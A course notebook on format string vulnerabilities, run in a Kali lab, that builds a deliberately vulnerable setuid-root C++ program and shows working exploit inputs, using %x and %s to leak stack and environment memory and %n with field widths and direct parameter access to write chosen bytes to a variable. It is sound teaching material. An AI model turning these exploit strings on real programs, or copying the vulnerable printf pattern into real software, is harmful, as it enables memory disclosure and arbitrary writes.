# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can be used to print fixed strings, variables in many different formats
- other cstring functions that uses format strings are: `fprintf`, `sprintf`, `scanf`, `fscanf`, `sscanf`
- hello.cpp program below uses `printf()` incorrectly!
- "Good Bye World!\n" string technically is the format string (devoid of special escape sequences called format parameters)
- format parameters begins with a `%` sign; for each format parameter (%) function expects arguments
- format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- following parameter requires values/variables as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers/addresses as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

- `%s` - reads the data pointed to by the address/pointer provided as an argument
- `%n` is intriguing parameter as it expectes integer address and writes number of bytes written so far to starndard output to that address!
    - what could potentially go wrong here?!!...

- `%s` and `%n` are the focus of this notebook

In [1]:
%pwd

'/home/kali/projects/SoftwareSecurity/notebooks'

In [2]:
%cd ../demos

/home/kali/projects/SoftwareSecurity/demos


In [3]:
%cat hello.cpp

#include <iostream>
#include <cstdio>

using namespace std;

int main(){
    cout << "Hello World!" << endl;
    printf("Good bye...!\n");
    return 0;
}


In [10]:
! g++ -m32 -std=c++20 -o hello.exe hello.cpp

In [9]:
! ./hello.exe

Hello World!
Good bye...!


## Format Parameters Examples
- let's look into fmt_strings.cpp program to see common usage of format strings and parameters

In [7]:
%cd fmt_strings

/home/kali/projects/SoftwareSecurity/demos/fmt_strings


In [8]:
! cat fmt_strings.cpp

#include <cstdio>
#include <cstring>
#include <string>

using namespace std;


int main(int argc, char * argv[]) {
   char c_string[10] = "sample";
   int A = -73;
   unsigned int B = 31337;
   string cpp_string = "Hello from C++";

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', 8: '%08u'\n", B, B, B);
   printf("[c_string] %s is @ %p\n", c_string, c_string);
   printf("[cpp_string] %s is @ 0x%08x\n", cpp_string.c_str(), &cpp_string);

   // Example of unary address operator (dereferencing) and a %x format string
   printf("variable A is at address: %p\n", &A);
   return 0;
}

In [9]:
! g++ -m32 -o fmt_strings.exe fmt_strings.cpp

In [10]:
! g++ -m32 -Wall -o fmt_strings.exe fmt_strings.cpp

[01m[Kfmt_strings.cpp:[m[K In function ‘[01m[Kint[01;32m[K main[m[K(int, char**)[m[K’:
   19 |    printf("[cpp_string] %s is @ 0x[01;35m[K%08x[m[K\n", cpp_string.c_str(), [32m[K&cpp_string[m[K);
      |                                   [01;35m[K~~~^[m[K                         [32m[K~~~~~~~~~~~[m[K
      |                                      [01;35m[K|[m[K                         [32m[K|[m[K
      |                                      [01;35m[Kunsigned int[m[K              [32m[Kstd::string* {aka std::__cxx11::basic_string<char>*}[m[K


In [14]:
! cp ../../demos/compile.sh .

In [16]:
%%bash
input="fmt_strings.cpp"
output=fmt_strings.exe
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: fmt_strings.cpp: In function ‘int main(int, char**)’:
   19 |    printf("[cpp_string] %s is @ 0x%08x\n", cpp_string.c_str(), &cpp_string);
      |                                   ~~~^                         ~~~~~~~~~~~
      |                                      |                         |
      |                                      unsigned int              std::string* {aka std::__cxx11::basic_string<char>*}
   22 |    printf("variable A is at address: %p\n", &A);
      |                                      ~^     ~~
      |                                       |     |
      |                                       void* int*
      |                                      %n
    8 | int main(int argc, char * argv[]) {
      |          ~~~~^~~~
    8 | int main(int argc, char * argv[]) {
      |                    ~~~~~~~^~~~~~


In [17]:
# note high value for A: -ve value is stored using two's complement
! ./fmt_strings.exe

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', 8: '00031337'
[c_string] sample is @ 0xffffbcfd
[cpp_string] Hello from C++ is @ 0xffffbce0
variable A is at address: 0xffffbcf8


## Format Parameter `%n`

- `%n` - uncommon, but let's understand how it works
- `%n` - takes pointer argument; writes the number of bytes written so far to the corresponding variable's address

In [18]:
cat fmt_uncommon.cpp


#include <cstdio>
#include <cstdlib>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   return 0;
}

In [19]:
%%bash
input="fmt_uncommon.cpp"
output=fmt_uncommon.exe
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: fmt_uncommon.cpp: In function ‘int main()’:
   15 |    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
      |                              ~~~^                   ~~
      |                                 |                   |
      |                                 unsigned int        int*
      |                              %08n


In [20]:
! ./fmt_uncommon.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffbd18.  B is 7.


### Stack frame of printf( )
- let's look just before the printf() is called in fmt_uncommon.cpp
- look at the last printf()

#### printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
- hint: arguments are pushed in reverse order (last argument first)


|Top of the stack|
| :----: |
| local variable |
| EBP of main |
| return address to main |
| Address of format string (first argument)|
| Value of A |
| Address of A |
| Value of B |
| ... |
| Stack frame of main |
| Bottom of the Stack |

### what if?
- what happens if fewer arguments are passed to printf()?
    - what kind of error happens: syntax error? logical error? run-time error?
- e.g,: `printf("A is %d and is at %08x. B is %x.\n", A, &A);`
- what if no arguments are provided to format parameters of the printf() 
    - no argument is provided to the last parameter `%x` parameter, e.g.
- fmt_uncommon2.cpp provided in demos/fmt_strings/fmt_uncommon2.cpp demonstrates just this
- fmt_uncommon2.cpp is essentially same as fmt_uncommon.cpp file except in one line

In [21]:
# see the difference between the fmt_uncommon.cpp and fmt_uncommon2.cpp
! diff fmt_uncommon.cpp fmt_uncommon2.cpp

15c15
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x.  B is %x.\n", A, &A);


In [22]:
%%bash
# let's compile the fmt_uncommon2.cpp file
input=fmt_uncommon2.cpp
output=fmt_uncommon2.exe

echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: fmt_uncommon2.cpp: In function ‘int main()’:
   15 |    printf("A is %d and is at %08x.  B is %x.\n", A, &A);
      |                              ~~~^                   ~~
      |                                 |                   |
      |                                 unsigned int        int*
      |                              %08n
   15 |    printf("A is %d and is at %08x.  B is %x.\n", A, &A);
      |                                          ~^
      |                                           |
      |                                           unsigned int
    6 |    int A = 5, B = 7, count_one, count_two;
      |               ^


In [24]:
# execute the program
! ./fmt_uncommon2.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffbd18.  B is 804917d.


### Note the value of B
- Is that the correct value of B? So, what happend?
- since there's no corresponding argument for third `%x`, it pulled some value stored in the location where the third argument was supposed to be on the stack
- this is the value found below the stack frame of the printf function
- as a result, program read data from memory that it's not supposed to
    - violation of confidentialy and integrity of the data/program

## The Format String Vulnerability
- if string variable is printed directly `printf(string)` instead of `printf("%s", string)`
    - if the value of string variable can't be trusted; usually user provided or received externally from another program, network, file, etc.
- let's demonstrate the format string vulnerability using `fmt_vuln.cpp` program in `demos/fmt_strings/vuln1/` folder

In [25]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/fmt_strings


In [26]:
# change working directoroy to vuln1 folder
%cd vuln1

/home/kali/projects/SoftwareSecurity/demos/fmt_strings/vuln1


In [27]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/fmt_strings/vuln1


In [28]:
! ls -al

total 64
drwxr-xr-x 2 kali kali  4096 Apr 16 00:39 .
drwxr-xr-x 3 kali kali  4096 Apr 23 14:53 ..
-rw-r--r-- 1 kali kali   100 May  3  2024 exploit_fmt.bin
-rw-r--r-- 1 kali kali   610 May  3  2024 fmt_vuln.cpp
-rwsr-xr-x 1 root root 21484 Apr 16 00:39 fmt_vuln.exe
-rw-r--r-- 1 root root 10524 Apr 16 00:39 fmt_vuln.o
-rw-r--r-- 1 kali kali   500 May  3  2024 getenvaddr.cpp
-rw-r--r-- 1 kali kali   870 May  3  2024 Makefile
-rw-r--r-- 1 kali kali    35 May  3  2024 shellcode_root.bin


In [29]:
! cat fmt_vuln.cpp

#include <cstdio>
#include <cstdlib>
#include <cstring>

int main(int argc, char *argv[]) {

   static int test_val = -72;
   char text[1024];
   
   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }

   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\n\nThe wrong way to print user-controlled input:\n");
   printf(text);
   printf("\n\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
   printf("[*] text is @ %p\n", &text);
   exit(0);
}


In [27]:
# let's compile the file using the provided Makefile
! echo kali | sudo -S make

[sudo] password for kali: # disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 fmt_vuln.cpp
[01m[Kfmt_vuln.cpp:[m[K In function ‘[01m[Kint[01;32m[K main[m[K(int, char**)[m[K’:
   25 |    printf("[*] test_val @ 0x[01;35m[K%08x[m[K = %d 0x%08x\n", [32m[K&test_val[m[K, test_val, test_val);
      |                             [01;35m[K~~~^[m[K                 [32m[K~~~~~~~~~[m[K
      |                                [01;35m[K|[m[K                 [32m[K|[m[K
      |                                [01;35m[Kunsigned int[m[K      [32m[Kint*[m[K
      |                             [32m[K%08n[m[K
# builds executable from object files
g++ -m32 -fno-stack-protector -z execstack -no-pie -o fmt_vuln.exe *.o
sudo chown root:root fmt_vuln.exe
sudo chmod u+s fmt_vuln.exe


In [28]:
# make sure ownership is changed to root and SETEUID is set
! ls -al fmt_vuln.exe

-rwsr-xr-x 1 root root 21484 Apr 16 00:39 fmt_vuln.exe


In [29]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [30]:
! ./fmt_vuln.exe "testing 124 abc #\$$556"
# Note $ has special meaning to printf() function; you'll see the usage below

The right way to print user-controlled input:
testing 124 abc #$556

The wrong way to print user-controlled input:
testing 124 abc #$556

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb900


In [31]:
# what if you provide %s as value
! ./fmt_vuln.exe "testing%s"
# notice the repeating of the argument itself!

The right way to print user-controlled input:
testing%s

The wrong way to print user-controlled input:
testingtesting%s

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb910


## Control the Input String
- we see `%s` provided in the input string prints itself
- if `%s` is forced to print string from arbitrary address, you'll crash the program!

In [24]:
# what if you provide a bunch of %s as value
# try adding one %s at a time until the program crashes!
! ./fmt_vuln.exe "AAAA%x"

The right way to print user-controlled input:
AAAA%x

The wrong way to print user-controlled input:
AAAAffffb940

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb940


In [25]:
# when program crashes, the vulnerable printf() function 
# chokes and doesn't print anything
! ./fmt_vuln.exe "AAAA%s%s"

The right way to print user-controlled input:
AAAA%s%s

The wrong way to print user-controlled input:


In [26]:
# let's check if it crashes now
! ./fmt_vuln.exe "AAAA%s%s%s"

The right way to print user-controlled input:
AAAA%s%s%s

The wrong way to print user-controlled input:


In [27]:
# let's check if it crashes now
! ./fmt_vuln.exe "AAAA%s%s%s%s"

The right way to print user-controlled input:
AAAA%s%s%s%s

The wrong way to print user-controlled input:


In [28]:
# you can seed things up...
! ./fmt_vuln.exe $(python -c 'print("AAAA%s."*50)')
# the rest of the output is not printed due to run-time exception

The right way to print user-controlled input:
AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.

The wrong way to print user-controlled input:


### Let's Use %x Parameter
- recall, `%x` parameter formats the argument in Hex
- what if you provide `%x` as part of data?

In [32]:
! ./fmt_vuln.exe AAAA%x%x%x%x%x
# note the address of text...

The right way to print user-controlled input:
AAAA%x%x%x%x%x

The wrong way to print user-controlled input:
AAAAffffb930ffffffff80491b04141414178257825

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [33]:
# process can be reapeated to examine stack memory below at the higher addresses
# just provide a lot of format parameter as hex and see what's on stack
! ./fmt_vuln.exe $(python -c 'print("AAAA" + "%08x."*40, end="")')
# Note: as more data is passed to the program, text address shifts

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.

The wrong way to print user-controlled input:
AAAAffffb870.ffffffff.080491b0.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb870


In [34]:
# notice a bunch of 2e78383025 are repeated
# each four bytes values are reversed due to little-endian architecture
! python -c 'print("\x25\x30\x38\x78\x2e")'

%08x.


In [35]:
# try to print the same output as string
! ./fmt_vuln.exe $(python -c 'print("%s."*40)')
# the program crashes...

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.

The wrong way to print user-controlled input:


## Read from Arbitrary Memory Address
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the `%s` format parameter
- if a valid memory address is used, this process could be used to read a string found at that memory address

### Environment variables are loaded into each program's memory
- we'll use demos/stack_overflow/getenvaddr.cpp to get address of an env variable
- use the PATH variable's address as an argument for `%s`
    - essentially force the program to print the value of PATH variable
```bash
$ ./fmt_vuln.exe $(print "\x address in reverse bytes")%08x-%08x-%08x-%s
```

In [50]:
# provide a bunch of %08x as a part of string to see where the first string repeats
! ./fmt_vuln.exe AAAABBBB-%08x-%08x-%08x-%08x-%08x
# notice that fourth parameter is repeating from begnning of the format string 
# AAAA is 4th parameter

The right way to print user-controlled input:
AAAABBBB-%08x-%08x-%08x-%08x-%08x

The wrong way to print user-controlled input:
AAAABBBB-ffffb920-ffffffff-080491b0-41414141-42424242

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb920


In [51]:
# try printing the AAAA as %s
! ./fmt_vuln.exe AAAA%08x-%08x-%08x-%x

The right way to print user-controlled input:
AAAA%08x-%08x-%08x-%x

The wrong way to print user-controlled input:
AAAAffffb930-ffffffff-080491b0-41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


- why do we get segfault?
- it's attempting to print string at the address AAAA 
- recall `%s` needs address of c-string parameter
- how about we provide some valid memory address instead of AAAA?

In [43]:
! env | grep $PATH

PATH=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games


In [44]:
# let's copy getenvaddr.cpp file into the current folder
! cp ../../../demos/stack_overflow/getenvaddr.cpp .

In [45]:
! ls -al

total 64
drwxr-xr-x 2 kali kali  4096 Sep 13 13:21 .
drwxr-xr-x 3 kali kali  4096 Sep 11 13:07 ..
-rw-r--r-- 1 kali kali   100 Sep 11 13:07 exploit_fmt.bin
-rw-r--r-- 1 kali kali   610 Sep 11 13:07 fmt_vuln.cpp
-rwsr-xr-x 1 root root 21412 Sep 13 13:21 fmt_vuln.exe
-rw-r--r-- 1 root root 10384 Sep 13 13:21 fmt_vuln.o
-rw-r--r-- 1 kali kali   500 Sep 15 13:03 getenvaddr.cpp
-rw-r--r-- 1 kali kali   870 Sep 11 13:07 Makefile
-rw-r--r-- 1 kali kali    35 Sep 11 13:07 shellcode_root.bin


In [46]:
# compile and run getevnaddr.cpp to find the memory 
# address of env variables wrt  programs
! cat getenvaddr.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char *ptr;

    if(argc < 3) {
        printf("Usage: %s <env variable name> <target program name>\n", argv[0]);
    }
    else {
        ptr = getenv(argv[1]); /* get env var location */
        int diff = (strlen(argv[0]) - strlen(argv[2]))*2;
        ptr += diff; /* adjust for program name */
        printf("%s will be at %p with reference to %s\n", argv[1], ptr, argv[2]);
    }
    return 0;
}


In [47]:
%%bash
input="getenvaddr.cpp"
output="getenvaddr.exe"
g++ -m32 -o $output $input

In [48]:
# find address of PATH variable wrt fmt_vuln.exe
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xffffc285 with reference to ./fmt_vuln.exe


In [52]:
# let's try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(printf "\x85\xc2\xff\xff")%08x-%08x-%08x-%s

The right way to print user-controlled input:
����%08x-%08x-%08x-%s

The wrong way to print user-controlled input:
����ffffb930-ffffffff-080491b0-/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [53]:
# you can use python to change the byte order
# so you don't have to write in reverse oder in hex format
! python -c 'import sys; sys.stdout.buffer.write((0xffffc285).to_bytes(4, byteorder="little"))'

����

In [54]:
# let's try to read the value of PATH using fmt_vuln.exe using python
! ./fmt_vuln.exe $(python -c 'import sys; sys.stdout.buffer.write((0xffffc285).to_bytes(4, byteorder="little"))')%08x-%08x-%08x-%s

The right way to print user-controlled input:
����%08x-%08x-%08x-%s

The wrong way to print user-controlled input:
����ffffb930-ffffffff-080491b0-/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


### Notice if part of variable name PATH= is missing from the value /home/user/...
- we overshot the address by 5 bytes
- we can stubtract (# of missing characters); essentially reducing the PATH address by 5 bytes

In [55]:
# can subtract from the complete address
! printf "%x" $((0xffffc285-5))

ffffc280

In [56]:
# or just substract from the leaset significant byte
# using Python
print("{:x}".format(0x85-5))

80


In [57]:
! ./fmt_vuln.exe $(python -c 'import sys; sys.stdout.buffer.write((0xffffc280).to_bytes(4, byteorder="little"))')%08x-%08x-%08x-%s
# now we see our complete path

The right way to print user-controlled input:
����%08x-%08x-%08x-%s

The wrong way to print user-controlled input:
����ffffb930-ffffffff-080491b0-PATH=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


## Write to Arbitrary Memory Address
- `%s` - can be used to read an arbitrary memory address as string
- `%x` - can be used to read an arbitrary memory address as Hex
- `%n` - can be used to write to arbitrary memory address
- note that `test_val` variable has been printing its address and value in the debug statement
- what if we provide the address of test_val for our `%n` parameter?

```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%08x-%08x-%08x-%n
```

- however, the resulting value in the `test_val` variable depends on the number of bytes written before the `%n`
- this can be controlled to a a greater degree by manipulating the field **WIDTH** option so we don't have to print a larger number of actual characters to write something more meaningful such as memory address to `test_val`

```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%x-%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%100x-%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%400x-%n
```

In [61]:
# let's note the address of test_val
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x

The wrong way to print user-controlled input:
AAAAffffb930ffffffff80491b041414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [62]:
# use the address of test_val to write to for %n parameter
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%08x-%08x-%08x-%n
# Note test_val: which is the total bytes written thus far by printf()

The right way to print user-controlled input:
�-%08x-%08x-%08x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-080491b0-

[*] test_val @ 0x0804c01c = 32 0x00000020
[*] text is @ 0xffffb930


In [63]:
# value can be controlled by manipulating the field width of arguments before it
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%x-%n

The right way to print user-controlled input:
�-%x-%x-%x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-80491b0-

[*] test_val @ 0x0804c01c = 31 0x0000001f
[*] text is @ 0xffffb930


In [64]:
# value can be controlled by manipulating the field width of arguments before it
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%100x-%n

The right way to print user-controlled input:
�-%x-%x-%100x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-                                                                                             80491b0-

[*] test_val @ 0x0804c01c = 124 0x0000007c
[*] text is @ 0xffffb930


In [66]:
# value can be controlled by manipulating the field width of arguments before it
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%284x-%400x-%n

The right way to print user-controlled input:
�-%x-%284x-%400x-%n

The wrong way to print user-controlled input:
�-ffffb930-                                                                                                                                                                                                                                                                                    ffffffff-                                                                                                                                                                                                                                                                                                                                                                                                         80491b0-

[*] test_val @ 0x0804c01c = 700 0x000002bc
[*] text is @ 0xffffb930


## Write User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- $ 0xAA \rightarrow 1^{st} byte$
- $ 0xBB \rightarrow 2^{nd} byte$
- $ 0xCC \rightarrow 3^{rd} byte$
- $ 0xDD \rightarrow 4^{th} byte$

| Memory address | Value |
| --- | --- |
| 0x0804c01c | AA |
| 0x0804c01d | BB |
| 0x0804c01e | CC |
| 0x0804c01f | DD |

In [67]:
# findout the width value to print 0xaa in the right location
# 8 is used to standarize the output (8 hex characters, 4 bytes); 
# less than 8 is not enough width and is ignored by printf() 
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%8x-%n

The right way to print user-controlled input:
�-%x-%x-%8x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff- 80491b0-

[*] test_val @ 0x0804c01c = 32 0x00000020
[*] text is @ 0xffffb930


In [69]:
# 0xaa is the goal; 32 is what 8 width provides
! printf "%d" $(( 0xaa - 32+8))

146

In [70]:
# or use python
print(0xaa-32+8)

146


In [71]:
# replace width 8 with the resulting value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%146x-%n
# test_val = 0x000000aa
# we've aa least significant byte in right the place

The right way to print user-controlled input:
�-%x-%x-%146x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-                                                                                                                                           80491b0-

[*] test_val @ 0x0804c01c = 170 0x000000aa
[*] text is @ 0xffffb930


In [72]:
# next write 0xbb, 0xcc, and 0xdd
# need 3 more %x%n format to write to each byte of addresses
# since %x needs some 4 bytes to write, we can provide anything such as JUNK
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%8x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%8x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb920-ffffffff- 80491b0

[*] test_val @ 0x0804c01c = 55 0x00000037
[*] text is @ 0xffffb920


In [73]:
# find the width to be used so the final value is 0xaa
! echo $(( 0xaa-55+8 ))

123


In [74]:
# replace width 8 width with the result to write 0xaa
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb910-ffffffff-                                                                                                                    80491b0

[*] test_val @ 0x0804c01c = 170 0x000000aa
[*] text is @ 0xffffb910


In [75]:
# next need to write 0xbb in 2nd byte
print(0xbb - 0xaa)

17


In [76]:
# now write 0xbb in correct address
# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n-%16x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n-%16x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb910-ffffffff-                                                                                                                    80491b0-        4b4e554a

[*] test_val @ 0x0804c01c = 48042 0x0000bbaa
[*] text is @ 0xffffb910


In [77]:
print(0xcc - 0xbb)

17


In [78]:
# now write 0xcc in correct address
# add %17x%n or -16x
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n-%16x%n-%16x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n-%16x%n-%16x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb910-ffffffff-                                                                                                                    80491b0-        4b4e554a-        4b4e554a

[*] test_val @ 0x0804c01c = 13417386 0x00ccbbaa
[*] text is @ 0xffffb910


In [79]:
# finally write 0xdd
print(0xdd - 0xcc)

17


In [80]:
# now write 0xdd in correct address
# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n-%16x%n-%16x%n-%16x%n
# note JUNK can be anything

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n-%16x%n-%16x%n-%16x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb900-ffffffff-                                                                                                                    80491b0-        4b4e554a-        4b4e554a-        4b4e554a

[*] test_val @ 0x0804c01c = -573785174 0xddccbbaa
[*] text is @ 0xffffb900


## Use Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using argument order # (starting from 1) and the the dollar sign qualifier
    - `%1$d` - access the $1^{st}$ parameter and display it as a decimal number
    - `%2$x` - access the $2^{nd}$ parameter and display it as as a hexadecimal number
- instead of sequentially accessing the first three parameters and using 4 bytes spacers of JUNK to increment the byte output count, we can use direct parameter access
- let's write a more realistic-looking address of **0xbffffd72** into the variable test_val in fmt_vuln program
- let's see how direct parameter access works using example provided in demo-programs

In [32]:
!pwd

/home/kali/projects/SoftwareSecurity/demos/fmt_strings/vuln1


In [141]:
! cat ../fmt_directpara.cpp

#include <stdio.h>

int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
    return 0;
}


In [142]:
%%bash
input="../../../demos/fmt_strings/fmt_directpara.cpp"
output="directpara.exe"
g++ -m32 -o $output $input

In [143]:
! ./directpara.exe

7th: 70, 4th: 00040


In [144]:
# without direct access
! ./fmt_vuln.exe AAAA%x%x%x%x
# 4th parameter is where AAAA repeats; if not sure, try one at a time by adding %x

The right way to print user-controlled input:
AAAA%x%x%x%x

The wrong way to print user-controlled input:
AAAAffffb930ffffffff80491b041414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [154]:
# access the fourth argument (from beginning of the format string printf(...))
# $ sign is special character for bash so must be escaped
! ./fmt_vuln.exe abcdBBBBAAAA%6\$x
# can try 1 at a time from 1...n until you see AAAA printed in hex

The right way to print user-controlled input:
abcdBBBBAAAA%6$x

The wrong way to print user-controlled input:
abcdBBBBAAAA41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [155]:
# use the same technique to write to the 4th argument as address
